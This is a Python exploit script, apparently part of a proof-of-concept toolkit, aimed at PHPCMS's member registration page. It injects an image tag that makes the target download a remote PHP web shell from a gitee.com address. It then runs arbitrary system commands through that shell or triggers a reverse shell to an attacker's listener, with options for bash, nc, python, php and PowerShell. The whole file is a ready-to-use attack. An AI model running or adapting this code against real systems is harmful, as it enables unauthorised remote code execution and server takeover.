#!/usr/bin/env python
#coding: utf-8
import requests
import sys
import random
import re
import time
import base64
import argparse
from json_parse import Jsonparse
from json_parse import Reverse_shell


verify = True
string=''

fileurl = ['<img src=http://gitee.com/dylk/tmpp/raw/master/cimer.php?.php#.jpg>','<img src=http://gitee.com/dylk/tmpp/raw/master/ts.php?.php#.jpg>']


class phpcms(object):
    def __init__(self,ip,port,level, cmd):
        self.ip = ip
        self.port = port
        self.level = level
        self.cmd = cmd
        self.tg = 'http://'+self.ip+':'+str(self.port)+'/index.php?m=member&c=index&a=register&siteid=1'
        
        
    def do(self,files):
        name = string.join(random.sample(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 10)).replace(" ", "")
        data = {
                    'siteid': '1',
                    'modelid': '1',
                    'username': name,
                    'password': name+'1',
                    'email': name+'@test.com',
                    'info[content]': files,
                    'dosubmit': '1',
        }
        
        try:
            r1 = requests.post(url=self.tg, data=data, timeout = self.level,verify=verify)
        except Exception as e:
            print(e)
            exit(219)
        re_result = re.findall(r'&lt;img src=(.*)&gt', r1.content)
        if len(re_result):
            shell = re_result[0]
            return shell
        else:
            print("error")
            exit(219)

    
    def exec_command(self):
        shellcmd = self.do(fileurl[0])
        try:
            check = requests.get(url = shellcmd, timeout = self.level, verify=verify)
            if check.status_code == 200:
                print('[+] shell:'+shellcmd+ ' passwd:cimer upload success')
                payload1 = {"cimer": "system('{}');".format(self.cmd)}
                # print(payload1)
                result = requests.post(url = shellcmd, data = payload1, timeout = self.level, verify=verify)
                print('<PRTINFOZHANG><' + base64.b64encode(result.text) + '><PRTINFOZHANG>')
        except Exception as e:
            print(e)
            exit(219)

    def reverse_shell(self):
        shelle = self.do(fileurl[1])
        pdata = {
            "ip" : listenIp,
            "port" : listenPort,
        }
        fr = requests.post(shelle,data=pdata,timeout=self.level,verify=verify)
        
        
        
          
if __name__ == '__main__':
    # 定义脚本参数接收
    # config.json:json文件的相对路径
    # ​	targetip：目标主机ip
    # ​	targetPort：目标主机端口
    # ​	反弹shell类型： 
    # ​		1——bash反弹
    # ​		2——nc反弹
    # ​		3——python反弹
    # ​		4——php反弹
    # ​		5——windows powershell反弹
    # ​		6——常规命令的执行接口
    # ​	listenIp——监听服务器ip
    # ​	listenPort——监听端口
    # ​	exec_cmd——用户可执行的shell命令，接口的形式，默认传一个值，否者会报错， 传入时一定要用引号引起来，不然空格会当成多个参数使用
    jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
    jsonobj = Jsonparse(jsonfile)
    jsondata = jsonobj.parse()
    targetIp = sys.argv[2]
    timeout = jsondata['timeout']
    targetPort = sys.argv[3]
    
    reverseType = sys.argv[4]
    listenIp = sys.argv[5]
    listenPort = sys.argv[6]
    exec_cmd = sys.argv[7]

    # 实例化反弹shell参数的对象
    reverse_shell = Reverse_shell(listenIp, listenPort, int(reverseType), exec_cmd)
    # 获取反弹shell的payload
    cmd = reverse_shell.select_type()
    #print(cmd)

    Scanner = phpcms(targetIp, int(targetPort), timeout, cmd)
    #判断reverseType类型是反弹shell，还是执行命令
    if int(reverseType) == 6:
        Scanner.exec_command()
    else:
        Scanner.reverse_shell()